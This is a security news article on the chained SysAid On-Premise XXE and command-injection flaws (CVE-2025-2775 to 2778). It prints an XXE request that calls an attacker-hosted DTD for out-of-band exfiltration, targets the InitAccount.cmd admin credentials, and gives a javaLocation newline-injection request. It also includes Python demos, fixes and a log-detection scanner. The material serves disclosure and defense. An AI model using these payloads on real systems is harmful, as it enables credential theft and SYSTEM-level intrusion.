SysAid ITSM Platform Vulnerability Enables Pre-Authenticated Remote Code Execution

SysAid, a widely deployed IT Service Management (ITSM) platform, has patched four critical vulnerabilities in its on-premise software. Chained together, they let an unauthenticated attacker achieve Remote Code Execution (RCE) as SYSTEM on the Windows server hosting SysAid.

The flaws, CVE-2025-2775, CVE-2025-2776 and CVE-2025-2777 (all XML External Entity, or XXE, injections) and CVE-2025-2778 (OS command injection), were disclosed by researchers from watchTowr Labs and others, and present a severe risk to organizations running unpatched versions of SysAid.

Technical Details

Product Scope:

  • Affected: SysAid On-Premise (self-hosted) versions ≤ 23.3.40
  • Not affected: SysAid SaaS (cloud-hosted)

Vulnerability Chain:
The attack chain combines three pre-authentication XXE vulnerabilities with one post-authentication OS command injection.
Here is how the attack unfolds:

1. Pre-Auth XXE Vulnerabilities

  • CVE-2025-2775: XXE in the /mdm/checkin endpoint.
    The GetMdmMessage#doPost handler parses user-supplied XML without disabling DTDs or external entity resolution, so a crafted POST body can declare external entities and have the server resolve them.
  • CVE-2025-2776: XXE in the /mdm/serverurl endpoint.
    Same root cause, reached through a different code path in the same handler.
  • CVE-2025-2777: XXE in the /lshw endpoint.
    The LshwAgent#doPost method feeds the request body to a SAX parser with no restrictions on DTDs or external entities, so the same XXE attack applies.

Sample Exploit Payload:

POST /mdm/checkin HTTP/1.1
Host: target
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://attacker/external.dtd">
%foo;
]>

This makes the server fetch and evaluate the attacker-controlled DTD while it is still parsing the prolog, so the outbound request happens before any document body is needed. The DTD can then define entities that read local files and send their contents back to the attacker (out-of-band exfiltration) or make the server issue requests to internal hosts (SSRF).

2. Credential Disclosure

The most damaging use of these XXEs is reading InitAccount.cmd, a file the installer creates that contains the initial administrator username and password in plaintext.

The file's first line holds the credentials. Exfiltrating that line through an XXE (for example via an attacker-hosted DTD) hands the attacker a valid admin login to the SysAid web interface.
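The mechanism behind the XXE steps above and the credential leak, shown as an added example that is not SysAid's or watchTowr's code: Python's standard-library xml.sax stands in for the Java SAX handler, the InitAccount.cmd stand-in and its contents are constructed, and the entity points at that local file so the leak is visible offline instead of going to an attacker-hosted DTD. The same block shows the hardening a handler like this needs: refuse any DOCTYPE and leave external entity resolution off.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


class TextCollector(ContentHandler):
    """Collects character data, i.e. whatever the parser ends up expanding into the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


class RejectDoctype:
    """Lexical handler that refuses any DOCTYPE, so no entity can be declared at all."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not accepted on this endpoint")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def write_fake_init_account(directory):
    # Constructed stand-in for InitAccount.cmd; the real file's location and format are not given here.
    path = os.path.join(directory, "InitAccount.cmd")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("sysaid_admin P@ssw0rd-constructed\n")
        fh.write("rem remaining installer lines\n")
    return path


def xxe_payload(target_path):
    # Same shape as the page's payload, but the entity points at a local file rather than
    # an external DTD, so the leaked text shows up directly in the parsed document.
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE checkin [\n"
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        "]>\n"
        "<checkin>&xxe;</checkin>\n"
    )


def parse_vulnerable(xml_text):
    """A SAX parser that resolves external entities; returns the text the document expands to."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # Python turns this off by default (3.7.1+); the vulnerable handler behaves as if it were on.
    parser.setFeature(feature_external_ges, True)
    parser.parse(io.StringIO(xml_text))
    return "".join(handler.chunks)


def parse_hardened(xml_text):
    """Same parser with entity resolution off and any DOCTYPE rejected before it is processed."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, False)
    parser.setProperty(property_lexical_handler, RejectDoctype())
    parser.parse(io.StringIO(xml_text))
    return "".join(handler.chunks)


def run_demo():
    """Returns (first line leaked by the vulnerable parser, whether the hardened parser refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        payload = xxe_payload(write_fake_init_account(tmp))
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            refused = False
        except ValueError:
            refused = True
    return leaked.splitlines()[0], refused


if __name__ == "__main__":
    credentials, refused = run_demo()
    print("vulnerable parser leaked:", credentials)
    print("hardened parser refused DOCTYPE:", refused)
```

Rejecting the DOCTYPE outright is the right fix for endpoints like these, which have no legitimate need for a DTD: it closes off external entities, parameter entities and entity-expansion attacks in one step, whereas toggling individual entity features leaves more room for a parser-specific gap.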

3. Post-Auth OS Command Injection (CVE-2025-2778)

With admin credentials in hand, the attacker turns to a command injection flaw in the API settings update function.

The javaLocation parameter is written into a batch file, updateApi.bat, without validation. Injecting newline characters followed by a command places that command on its own line of the batch file, and it runs when the batch file is later executed.

Exploit Example:

POST /API.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded

updateApi=false&updateApiSettings=true&javaLocation="%0acalc%0a

The request must carry an authenticated admin session. The double quote closes the quoted value in the batch file, the encoded newlines (%0a) start a fresh line, and calc runs as a standalone command when updateApi.bat executes, with the privileges of the SysAid service itself.
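How the quote-and-newline payload above turns a file path into a command, as an added example that is not SysAid's code: the batch template line is a constructed assumption (the article only says javaLocation is written into updateApi.bat), and the allow-list validator at the end is what the handler should have applied before writing anything to disk.

```python
import re
import urllib.parse

# Constructed stand-in for the batch template. The article only says javaLocation is written
# into updateApi.bat, so this line is an assumption, not SysAid's actual file contents.
UPDATE_BAT_TEMPLATE = '@echo off\r\n"{java_location}" -jar api-update.jar\r\n'

# Characters that must never reach a batch file from user input: line breaks, the quote
# that closes the path, and cmd.exe operators/expansion characters.
CMD_META = set('\r\n"&|<>^%!')
JAVA_EXE = re.compile(r'[A-Za-z]:\\(?:[^\\/:*?"<>|\x00-\x1f]+\\)*javaw?\.exe', re.IGNORECASE)


def decode_form_value(raw):
    """URL-decodes one form field as the servlet would before using it (%0a becomes a newline)."""
    return urllib.parse.unquote_plus(raw)


def render_update_bat(java_location):
    """The vulnerable behaviour: the value is written into the template verbatim."""
    return UPDATE_BAT_TEMPLATE.format(java_location=java_location)


def batch_commands(bat_text):
    """The commands cmd.exe would execute, one per non-empty line of the batch file."""
    return [line.strip() for line in bat_text.splitlines() if line.strip()]


def validate_java_location(value):
    """Allow-list check: an absolute Windows path to java.exe/javaw.exe with no metacharacters."""
    if any(ch in CMD_META or ord(ch) < 0x20 for ch in value):
        raise ValueError("javaLocation contains control or cmd.exe metacharacters")
    if not JAVA_EXE.fullmatch(value):
        raise ValueError("javaLocation is not an absolute path to java.exe or javaw.exe")
    return value


def is_rejected(value):
    """True if the validator refuses the value."""
    try:
        validate_java_location(value)
    except ValueError:
        return True
    return False


def render_update_bat_safe(java_location):
    """The hardened form: validate first, then write."""
    return render_update_bat(validate_java_location(java_location))


if __name__ == "__main__":
    injected = decode_form_value('"%0acalc%0a')  # the article's payload, decoded
    print(batch_commands(render_update_bat(injected)))  # 'calc' is now its own command line
    print("rejected by validator:", is_rejected(injected))
    print(batch_commands(render_update_bat_safe(r"C:\Program Files\Java\jdk-17\bin\java.exe")))
```

The rendered batch file is the whole story: the injected value splits the single quoted path line into three lines, and the middle one is an unconditional command. Validating against the shape of a Java executable path, rather than stripping a list of bad characters, is what keeps the value on one line.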

4. Full RCE Chain

By chaining these vulnerabilities, an unauthenticated attacker goes from reading a local file (the installer's InitAccount.cmd) to an admin login, and from there to arbitrary command execution as SYSTEM, the highest privilege on a Windows host.

Risk Factor Table

Vulnerability         | CVE ID        | Attack Vector     | Privileges Required | Impact                      | Exploitability | Risk Level
XXE in /mdm/checkin   | CVE-2025-2775 | Remote (pre-auth) | None                | File disclosure, SSRF       | Trivial        | Critical
XXE in /mdm/serverurl | CVE-2025-2776 | Remote (pre-auth) | None                | File disclosure, SSRF       | Trivial        | Critical
XXE in /lshw          | CVE-2025-2777 | Remote (pre-auth) | None                | File disclosure, SSRF       | Trivial        | Critical
OS Command Injection  | CVE-2025-2778 | Authenticated     | Admin               | Arbitrary command execution | Trivial        | Critical

Recommendations

  • Immediate Patch: Upgrade SysAid On-Premise to version 24.4.60 b16 or later, which addresses all four vulnerabilities.
  • Credential Audit: Change all admin passwords, including the initial account created by the installer, and review admin activity for unauthorized logins.
  • Compromise Assessment: Look for POST requests to /mdm/checkin, /mdm/serverurl and /lshw whose bodies carry DOCTYPE or ENTITY declarations, for requests to /API.jsp that change the API settings, for unexpected modifications to updateApi.bat, and for unexpected files in the webroot.
  • Restrict Access: Limit external exposure of SysAid servers and enforce network segmentation.
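A detection pass over request logs for the compromise assessment above, as an added example that is not part of the article: the log format and every entry in it are constructed (a proxy or WAF in front of SysAid would need to record request bodies for this to work, and the install path in the file:// entity is made up), while the indicators are the ones the article describes: DOCTYPE or ENTITY declarations posted to the three XXE endpoints, and an API.jsp settings update whose javaLocation carries a quote or line break. It also reports which sources performed both steps of the chain.

```python
import re
import urllib.parse

# Constructed reverse-proxy style log: tab-separated time, source IP, method, path,
# status and request body. Tomcat access logs do not record bodies, so this is the kind
# of record a WAF or proxy in front of the server would have to keep.
SAMPLE_LOG = "\n".join([
    '2025-05-07T10:15:32Z\t203.0.113.7\tPOST\t/mdm/checkin\t200\t<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % foo SYSTEM "http://203.0.113.9/ext.dtd">%foo;]><checkin/>',
    '2025-05-07T10:15:40Z\t198.51.100.4\tPOST\t/mdm/checkin\t200\t<?xml version="1.0"?><checkin><udid>constructed-device</udid></checkin>',
    # The install path below is made up; the article does not give the real location of InitAccount.cmd.
    '2025-05-07T10:16:05Z\t203.0.113.7\tPOST\t/lshw\t200\t<!DOCTYPE x [<!ENTITY f SYSTEM "file:///C:/SysAid/InitAccount.cmd">]><x>&f;</x>',
    '2025-05-07T10:18:51Z\t203.0.113.7\tPOST\t/API.jsp\t302\tupdateApi=false&updateApiSettings=true&javaLocation=%22%0acalc%0a',
    '2025-05-07T10:19:10Z\t198.51.100.4\tPOST\t/API.jsp\t302\tupdateApi=false&updateApiSettings=true&javaLocation=C%3A%5CProgram+Files%5CJava%5Cbin%5Cjava.exe',
    '2025-05-07T10:20:00Z\t198.51.100.4\tGET\t/index.jsp\t200\t',
])

XXE_ENDPOINTS = {"/mdm/checkin", "/mdm/serverurl", "/lshw"}
DTD_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
FIELDS = ("time", "src", "method", "path", "status", "body")


def parse_line(line):
    """Splits one tab-separated record into a dict; a missing body becomes an empty string."""
    parts = line.split("\t", 5)
    parts += [""] * (len(FIELDS) - len(parts))
    return dict(zip(FIELDS, parts))


def classify(entry):
    """Maps one request to the attack step it matches, or None."""
    if entry["method"] != "POST":
        return None
    if entry["path"] in XXE_ENDPOINTS and DTD_MARKER.search(entry["body"]):
        return "xxe"
    if entry["path"] == "/API.jsp":
        form = urllib.parse.parse_qs(entry["body"])
        if form.get("updateApiSettings", [""])[0] == "true":
            java = form.get("javaLocation", [""])[0]
            # A legitimate Java path never contains a line break or a double quote.
            if any(ch in java for ch in '\r\n"'):
                return "command-injection"
    return None


def scan_log(text):
    """Returns (time, src, path, step) for every record that matches an attack step."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        step = classify(entry)
        if step:
            findings.append((entry["time"], entry["src"], entry["path"], step))
    return findings


def chained_sources(findings):
    """Source IPs seen performing both steps: an XXE and the API.jsp command injection."""
    steps = {}
    for _, src, _, step in findings:
        steps.setdefault(src, set()).add(step)
    return sorted(src for src, seen in steps.items() if {"xxe", "command-injection"} <= seen)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("sources that completed the chain:", chained_sources(hits))
```

The XXE check deliberately keys on DOCTYPE and ENTITY rather than on a specific payload: the three endpoints never need a DTD from an MDM client or agent, so any declaration there is worth a ticket. The API.jsp check decodes the form body first, since the newline arrives as %0a on the wire.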

These vulnerabilities underscore the high risk posed by business-critical ITSM platforms like SysAid, especially when exposed to the internet.

The pre-auth nature, trivial exploitability, and potential for complete system compromise make immediate remediation essential for all on-premise SysAid deployments.


AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
